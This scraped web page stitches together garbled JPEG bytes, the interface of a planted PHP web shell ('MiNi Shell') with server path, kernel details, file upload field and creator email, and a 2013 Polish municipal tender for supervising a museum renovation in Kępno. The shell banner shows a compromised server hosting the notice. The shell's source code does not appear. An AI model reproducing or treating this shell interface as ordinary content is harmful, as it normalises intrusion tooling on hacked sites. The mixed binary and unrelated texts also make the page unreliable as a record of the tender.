JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131120/474772-N-2013.html

<p class="kh_header"><b>Kępno: Pełnienie obowiązków inspektora nadzoru inwestorskiego przy realizacji inwestycji pn. Remont i adaptacja budynku byłego magistratu w Kępnie na siedzibę Muzeum Ziemi Kępińskiej im. T. P. Potworowskiego</b><br>
<b>Numer ogłoszenia: 474772 - 2013; data zamieszczenia: 20.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kępno , ul. Ratuszowa 1, 63-600 Kępno, woj. wielkopolskie, tel. 62 78 25 800, faks 62 78 25 801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.kepno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków inspektora nadzoru inwestorskiego przy realizacji inwestycji pn. Remont i adaptacja budynku byłego magistratu w Kępnie na siedzibę Muzeum Ziemi Kępińskiej im. T. P. Potworowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje:

Przedmiotem zamówienia jest Pełnienie obowiązków inspektora nadzoru inwestorskiego przy realizacji inwestycji pn. Remont i adaptacja budynku byłego magistratu w Kępnie na siedzibę Muzeum Ziemi Kępińskiej im. T. P. Potworowskiego, wykonywanych w oparciu o decyzję o pozwoleniu na budowę:
a.	Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej,
b.	Roboty wykończeniowe w zakresie obiektów budowlanych,
c.	roboty budowlane w zakresie obiektów budowlanych - elewacja
d.	przygotowanie terenu pod budowę - zagospodarowanie terenu,
e.	przyłącze wodociągowe
f.	instalacje elektryczne
g.	instalacje centralnego ogrzewania zasilane z węzła ciepła
h.	Instalacje wentylacji 
i.	instalacji wodno- kanalizacyjnych 
j.	przyłącza wodociągowe
Nadzór inwestorski dotyczy robót budowlanych przedstawionych w zamówieniu publicznym umieszczonym  na stronie:  http://bip.kepno.pl/?c=8309

Na przedmiot zamówienia składa się pełnienie nadzoru inwestorskiego nad realizacją w/w zakresu rzeczowego robót:
a)	zgodnie z projektem, pozwoleniem na budowę, obowiązującymi przepisami w tym techniczno-budowlanymi, oraz przepisami bezpieczeństwa i higieny pracy
b)	kontrolowanie jakości wykonywanych robót, wyrobów budowlanych, a w szczególności wadliwych i niedopuszczonych do obrotu bądź stosowania w budownictwie.
c)	kontrolowanie i odbiór robót budowlanych ulegających zakryciu, uczestniczenie  w próbach i odbiorach technicznych instalacji oraz przygotowanie i udział w czynnościach odbioru i przekazywanie do użytkowania,
d)	potwierdzenie faktycznie wykonywanych robót oraz usunięcie wad.

Funkcje inspektora nadzoru inwestorskiego pełniona będzie w branżach:
a.	konstrukcyjno-budowlanej bez ograniczeń wraz z nadzorem robót budowlanych na obiektach zabytkowych nieruchomych
b.	instalacji sanitarnej bez ograniczeń w zakresie instalacji i urządzeń wodociągowych, kanalizacyjnych centralnego ogrzewania, wentylacji,
c.	instalacji elektrycznej bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych, instalacji i urządzeń teletechnicznych  
d.	nadzoru konserwatorski,
e.	nadzoru archeologiczny
Do obowiązków inspektora inwestorskiego należy pełny zakres czynności określony w  art. 25 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (Dz. U. z 2010r. nr 243 poz. 1623z późniejszymi zmianami). oraz obowiązki zapisane w umowie w tym:
1.	sprawdzanie i potwierdzanie obmiarów faktycznie wykonywanych robót oraz powykonawczych kosztorysów sporządzanych przez wykonawcę robót budowlanych,
2.	czuwanie nad prawidłowością treści protokołów odbiorów oraz faktur sporządzanych przez Wykonawcę robót budowlanych w zakresie fakturowania oraz finansowania przez jednostki współfinansujące,
3.	sprawdzenie jakości wykonywanych robót, wbudowanych wyrobów, a w szczególności zapobieganie zastosowaniu wyrobów wadliwych, niedopuszczonych do obrotu i stosowania w budownictwie,
4.	kontrola zgodności dostaw instalacji i urządzeń technicznych z dokumentacją oraz uczestniczenie w przeprowadzanych próbach i odbiorach technicznych instalacji i urządzeń,
5.	dokonywanie odbiorów częściowych od Wykonawcy robót budowlanych,
6.	organizowanie spotkań,
7.	współpraca z kierownikiem budowy, autorem projektu oraz osobą odpowiedzialną za realizację inwestycji ze strony Zamawiającego,
8.	opracowanie projektu protokołu odbioru robót,
9.	bieżące rozwiązanie problemów technicznych budowy
10.	współpraca z Zamawiającym w egzekwowaniu postanowień umowy na roboty budowlane,
11.	zapewnienie skutecznego nadzoru inwestorskiego, w tym pobyt na budowie minimum 1 raz w tygodniu oraz w razie konieczności na każde wezwanie Zamawiającego nie później niż w dniu następnym od daty wezwania (w przypadku nagłej potrzeby niezwłocznie),
12.	obecność branżowych inspektorów nadzoru na każde wezwanie Inspektora nadzoru lub Zamawiającego nie później niż w dniu następnym od daty wezwania oraz w trakcie realizacji nadzorowanych przez nich robót branżowych zaplanowanych w harmonogramie rzeczowo finansowym w zależności od potrzeby, w okresach uzgodnionych przez inspektora wiodącego z inspektorami branżowymi (w przypadku nagłej potrzeby niezwłocznie),
13.	sprawdzanie materiałów przedodbiorowych sporządzanych przez Wykonawcę robót budowlanych w zakresie sprawowanego nadzoru inwestorskiego,
14.	uczestniczenie w odbiorze końcowym inwestycji oraz przekazanie Zamawiającemu wszelkich niezbędnych dokumentów związanych z odbiorem końcowym robót,
15.	Inspektor nadzoru inwestorskiego zobowiązany jest pomóc Zamawiającemu uzyskać ostateczną decyzję pozwolenia na użytkowanie. 
16.	pełnienie nadzoru archeologicznego oraz uzyskanie pozwolenia na prowadzenie nadzoru archeologicznego w obrębie oraz wewnątrz budynku wpisanego do rejestru zabytków zgodnie z wytycznymi zawartymi w ustawie z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami (Dz. U. 2003r. nr 162, poz. 1568 z późniejszymi zamianami) oraz w rozporządzeniu Ministra Kultury z dnia 27 lipca 2011r. (Dz. U. 2011 nr 165, poz. 987) w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych
17.	dokonywanie wpisów w dzienniku budowy,
18.	rozliczenie finansowe zadania (uczestniczenie w rozliczeniu rzeczowo-finansowym inwestycji) w tym przygotowanie zestawień poniesionych wydatków
Uwaga:
Zamawiający wymagana bieżącej obecności osób pełniących funkcję inspektora nadzoru inwestorskiego podczas wykonywania robót budowlanych, nie rzadziej jednak niż 1 raz w tygodniu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1 000,00zł (jeden tysiąc i 00/100złotych)
Wadium może być wniesione w następujących formach:
1/ pieniądzu, 
2/ poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3/ gwarancjach bankowych,
4/ gwarancjach ubezpieczeniowych,
5/ poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2  ustawy  z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
Wadium w pieniądzu powinno być wpłacone przelewem na konto Zamawiającego w Banku Zachodnim WBK S.A. Oddział w Kępnie nr rachunku 65 1090 1144 0000 0000 1400 3711.
Wadium w innej formie niż w pieniądzu należy złożyć w kasie Urzędu Miasta i Gminy w Kępnie ul. Ratuszowa 1, 63-600 Kępno, dołączając do oferty potwierdzenie złożenia wadium.
2. Wadium wnosi się przed terminem składania ofert.
3. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 PZP nie złożył dokumentów lub oświadczeń, 
o których mowa w art. 25 ust. 1 PZP lub pełnomocnictw, chyba że udowodni, że wynika to 
z przyczyn nieleżących po jego stronie.
4. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia Zamawiający, żąda by Wykonawca wykazał, iż w okresie ostatnich 3 lat, (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed upływem terminu składania ofert wykonuje lub wykonał należycie co najmniej jedną usługę nadzoru budowlanego nad robotami budowlanymi polegającymi na budowie bądź przebudowie budynku o wartości brutto nie mniejszej niż 2.000.000,00 zł oraz co najmniej jedną usługę nadzoru budowlanego nad budynkiem podlegającym ścisłej ochronie konserwatorskiej wpisanym do rejestru zabytków nieruchomych o kubaturze minimalnej 3500m3 w którym wykonano roboty budowlane polegające na przebudowie budynku wraz wykonaniem instalacji sanitarnych i elektrycznych oraz  pełnym wykończeniem zewnętrznym i wewnętrznym.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, które posiadają uprawnienia budowlane w specjalności:
a.	inspektora nadzoru w branży konstrukcyjno-budowlanej wraz z uprawnieniami do kierowania robotami budowlanymi przy zabytkach nieruchomych wydane przez Wojewódzkiego Konserwatora Zabytków,
b.	inspektora nadzoru w branży instalacyjno sanitarnej bez ograniczeń w zakresie instalacji i urządzeń wodociągowych, kanalizacyjnych centralnego ogrzewania, wentylacji,
c.	inspektora nadzoru w branży instalacyjno elektrycznej bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych, instalacji i urządzeń teletechnicznych,
d.	nadzoru konserwatorskiego,
e.	nadzoru archeologicznego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wykonanie robót dodatkowych dotyczących umowy na roboty budowlane objęte nadzorem inwestorskim nie powoduje zwiększenia wynagrodzenia wynikającego z niniejszej umowy. Wykonawca ma obowiązek świadczyć usługi wymienione w rozdziale II niniejszej SIWZ  nad robotami dodatkowymi bez dodatkowego wynagrodzenia.
2.	Z zastrzeżeniem postanowień ust. 3 niniejszego paragrafu, niedopuszczalne są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
3.	Zmiany, o których mowa w ust. 2, mogą dotyczyć:
a)	zmiany terminu jej wykonania umowy, 
b)	zmiany inspektorów nadzoru jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego inspektora nadzoru. W przypadku zmiany Inspektora Nadzoru, nowy inspektor nadzoru musi  spełniać wymagania określone dla danego specjalisty w SIWZ
4.	Warunkiem dokonania zmian, o których mowa w ust. 3, jest złożenie wniosku przez stronę inicjującą zmianę zawierającego:
a)	opis propozycji zmiany umowy,
b)	uzasadnienie zmiany umowy.
5.	Zmiany, o których mowa w ust. 3, mogą zostać dokonane, jeżeli za ich wprowadzeniem przemawia choćby jedna z niżej wymienionych okoliczności:
a)	obniżenie kosztu wykonania usługi,
b)	zmiana obowiązujących przepisów,
c)	opóźnienia, utrudnienia, zawieszenia robót lub przeszkody spowodowane przez  Zamawiającego, lub innego wykonawcę zatrudnionego przez Zamawiającego na terenie budowy,
d)	siła wyższa,
6.	 Zmiana postanowień niniejszej umowy winny być dokonywana, pod rygorem nieważności, w formie pisemnego aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.kepno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Kępnie
ul. Ratuszowa 1
63-600 Kępno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2013 godzina 10:00, miejsce: Urząd Miasta i Gminy w Kępnie - SEKRETARIAT
ul. Ratuszowa 1
63-600 Kępno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest współfinansowane ze środków Unii Europejskiej z Regionalnego Programu Regionalnego w ramach Wielkopolskiego Regionalnego Programu Regionalnego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com